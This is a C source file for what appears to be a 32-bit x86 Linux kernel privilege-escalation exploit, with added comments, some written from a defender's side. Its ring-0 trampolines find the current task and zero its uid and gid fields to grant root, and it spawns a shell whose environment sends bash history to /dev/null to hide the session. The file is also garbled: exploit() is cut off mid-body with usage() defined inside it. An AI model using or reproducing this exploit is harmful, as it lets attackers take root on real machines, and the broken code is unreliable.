#include <stdlib.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/epoll.h>
#include <sys/mman.h>
#include <sys/resource.h>
#include <sys/utsname.h>
#include <linux/capability.h>
#include <asm/unistd.h>
#ifndef __USE_GNU
#define __USE_GNU
#endif
#include <unistd.h>
#include <errno.h>
#include <signal.h>
#include <string.h>
/**
* Relationship Variables
*
* 1: CONFIG_X86_PAE
* see /lib/modules/`uname -r`/build/.config
* 1.1: pse
* 2: THREAD_SIZE
* see the THREAD_SIZE define in include/asm/thread_info.h
*/
/*
 * Generates a two-argument raw system-call wrapper called `name`: it
 * enters the kernel with `int $0x80`, the syscall number (__NR_<name>,
 * from <asm/unistd.h>) in %eax and the two arguments in %ebx/%ecx.  That
 * is the 32-bit x86 calling convention, so this does not build anywhere
 * else.  `__syscall_return` is not defined on this page; it presumably
 * comes from the older kernel/glibc headers this was written against —
 * TODO confirm.  `__res` is in the identifier space reserved for the
 * implementation (double underscore).
 */
#define _capget_macro(type,name,type1,arg1,type2,arg2) \
type name(type1 arg1,type2 arg2) \
{ \
long __res; \
__asm__ volatile ( "int $0x80" \
: "=a" (__res) \
: "0" (__NR_##name),"b" ((long)(arg1)),"c" ((long)(arg2))); \
__syscall_return(type,__res); \
}
/* Defines capget() as a direct syscall, bypassing the libc wrapper. */
static inline _capget_macro(int,capget,void *,a,void *,b);
/*
 * Mask with the low 12 bits clear (equal to -4096): the asm trampolines
 * below AND it with %esp to round the stack pointer down to a 4096-byte
 * boundary, matching the THREAD_SIZE=4096 case named in usage().  It is a
 * variable rather than a constant because the asm reads it through an
 * "m" operand; the -t option presumably changes it elsewhere — TODO confirm.
 */
static int THREAD_SIZE_MASK = ~0xFFF;
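/*
 * Print the kernel identity and a "[-] message" line, then exit(1).
 *
 * The identity comes from uname(2) instead of system("uname -a"): no shell
 * is spawned and the output does not depend on PATH, so a failure report
 * cannot be hijacked or lost through the environment.
 *
 * @param message  human-readable reason for giving up; printed verbatim
 *                 via "%s", never used as a format string
 */
static void
fatal(const char *message)
{
	struct utsname u;

	/* Same fields uname -a prints; skip the line if uname() itself fails. */
	if (uname(&u) == 0) {
		printf("%s %s %s %s %s\n", u.sysname, u.nodename, u.release,
		       u.version, u.machine);
	}
	printf("[-] %s\n", message);
	exit(1);
}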
/*
 * Kernel-mode payload called from the __kcode trampoline below, which
 * pushes as `task` the word it finds at the THREAD_SIZE_MASK-aligned base
 * of the current kernel stack.
 *
 * Starting at `task` it walks upward one word at a time until four
 * consecutive words all equal `uid` (defined elsewhere in the file;
 * presumably the invoking user's uid — TODO confirm), then zeroes those
 * four words and the four after them.  The original comments label the
 * two groups as uids and gids.
 *
 * The scan has no upper bound: if the pattern never occurs the loop keeps
 * reading beyond the object until the machine faults in kernel mode.
 *
 * Defender's view: the observable effect is a process whose uid/gid fields
 * drop to 0 with no exec of a setuid program and no setuid()-style call —
 * credential-change auditing is where this shows up.
 *
 * @param task  start address of the scan
 */
void kernel(unsigned * task)
{
unsigned * addr = task;
/* looking for uids */
/* clear1 is defined elsewhere; only written here, presumably a flag the
 * user-space side polls — TODO confirm. */
*clear1 = 0;
while (addr[0] != uid || addr[1] != uid ||
addr[2] != uid || addr[3] != uid
)
addr++; /* no limit on how far past `task` this walks */
addr[0] = addr[1] = addr[2] = addr[3] = 0; /* set uids */
addr[4] = addr[5] = addr[6] = addr[7] = 0; /* set gids */
}
/*
 * `kcode` is a label inside the asm block below, not a C function; this
 * prototype only exists so C code can take its address.  The prologue the
 * compiler generates for __kcode() is never executed through that entry.
 */
void kcode(void);
/*
 * Kernel-mode trampoline entered at the `kcode` label (it executes cli and
 * iret, so it must already be running in ring 0; how control gets here is
 * set up elsewhere in the file).  It saves the general registers and
 * %ds/%es, loads both data segments from %ss so memory operands resolve in
 * the kernel's data segment, rounds %esp down with THREAD_SIZE_MASK, pushes
 * the word stored at that aligned address (presumably the task pointer at
 * the base of the kernel stack — TODO confirm against the target's
 * thread_info layout) as the argument to kernel(), then restores
 * everything and returns with iret.
 *
 * Fragility worth knowing about: the C-level asm() that loads
 * THREAD_SIZE_MASK into %eax declares no clobber, and the basic asm
 * statements around it are opaque to the compiler, so the sequence only
 * holds together if the compiler emits nothing between the three
 * statements.
 */
void __kcode(void)
{
asm(
"kcode: \n"
"cld \n" /* clear the direction flag */
" pusha \n"
" pushl %es \n"
" pushl %ds \n"
" movl %ss,%edx \n"
" movl %edx,%es \n"
" movl %edx,%ds \n");
/* %eax = THREAD_SIZE_MASK, read through an "m" operand (no clobber list). */
__asm__("movl %0 ,%%eax" ::"m"(THREAD_SIZE_MASK) );
asm(
" andl %esp,%eax \n" /* %eax = %esp rounded down to the stack base */
" pushl (%eax) \n" /* argument for kernel(): the word at that base */
" call kernel \n"
" addl $4, %esp \n" /* drop the argument */
" popl %ds \n"
" popl %es \n"
" popa \n"
" cli \n" /* interrupts off until iret restores EFLAGS */
" iret \n"
);
}
/*
 * `stub` is a label inside the asm block below; the prototype lets C code
 * take its address, as with kcode.
 */
void stub(void);
/*
 * Second kernel-mode trampoline, the lighter counterpart of __kcode: it
 * saves only the general registers (no cld, no %ds/%es reload — it relies
 * on whatever segments are live at entry), derives the same
 * THREAD_SIZE_MASK-aligned pointer from %esp, pushes the word found there
 * as the argument to raise_cap() (defined elsewhere in the file), pops the
 * argument into %eax — which the following popa restores — and returns
 * with iret.  Unlike __kcode it does not execute cli before iret.  The
 * same no-clobber caveat on the THREAD_SIZE_MASK load applies.
 */
void __stub(void)
{
asm (
"stub:;"
" pusha;"
);
/* %eax = THREAD_SIZE_MASK, read through an "m" operand (no clobber list). */
__asm__("movl %0 ,%%eax" ::"m"(THREAD_SIZE_MASK) );
asm(
" and %esp, %eax;" /* %eax = %esp rounded down to the stack base */
" pushl (%eax);" /* argument for raise_cap(): the word at that base */
" call raise_cap;"
" pop %eax;" /* drop the argument */
" popa;"
" iret;"
);
}
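/*
 * SIGSEGV/SIGBUS handler installed by exploit(): prints a failure banner
 * and exits with status 1.  KRADM and KRAD are string macros defined
 * elsewhere in the file.
 *
 * The literal was split by a raw line break in the original (an
 * unterminated string, which does not compile); it is rejoined here.
 * printf() and exit() are not async-signal-safe, so this is best-effort
 * diagnostics on a process that is terminating anyway.
 *
 * @param d  signal number (unused)
 */
static void
error(int d)
{
	(void)d;
	printf(KRADM "y3r 422 12 n07 3r337 3nuPh!\n" KRAD "Try increase nrpages?\n");
	exit(1);
}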
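/* argv for the shell spawned on success; KRADPS1 is defined elsewhere in the file. */
char *bashargv[] = { KRADPS1, NULL };
/*
 * Environment for that shell.  Two of the original entries were broken by
 * raw line breaks inside string literals (they do not compile); they are
 * rejoined here with the original values unchanged.
 * The HIST*-style variables all point bash's history at /dev/null, so the
 * session leaves no history on disk — from a defender's side, shells
 * started with HISTFILE=/dev/null are a setting worth looking for.
 */
char *bashenvp[] = {
	"TERM=linux",
	"PS1=[\\u@" KRADPS1 " \\W]\\$ ",
	"BASH_HISTORY=/dev/null",
	"HISTORY=/dev/null",
	"history=/dev/null",
	"HISTFILE=/dev/null",
	"PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin",
	NULL
};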
static int
exploit(unsigned kernelbase, int npages)
{
struct idt *idt;
struct idtr idtr;
signal(SIGSEGV, error);
signal(SIGBUS, error);
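/*
 * Print the option summary and terminate with _exit(1).
 *
 * Fix: the original called _exit() straight after printf(); _exit() does
 * not flush stdio, so when stdout is a pipe or file the whole usage text
 * was silently lost.  fflush(stdout) before _exit() keeps it.
 *
 * @param n  program name (argv[0]); printed through "%s"
 */
static void
usage(char *n)
{
	/* One entry per line of the original output, in the original order. */
	static const char *const help[] = {
		"\t-s forced cpu flag pse \n",
		"\t-a define CONFIG_X86_PAE,default none\n",
		"\t-e <num> have two kernel code,default 0\n",
		"\t-p <num> alloc pages(4k) ,default 1. Increase from 1 to 7\n"
		"\t\tThe higher number the more likely it will crash\n",
		"\t-t <num> default 0 \n"
		"\t\t0 :THREAD_SIZE is 4096;otherwise THREAD_SIZE is 8192\n",
		"\n",
	};

	printf("\nUsage: %s\n", n);
	for (size_t i = 0; i < sizeof help / sizeof help[0]; i++) {
		fputs(help[i], stdout);
	}
	fflush(stdout);
	_exit(1);
}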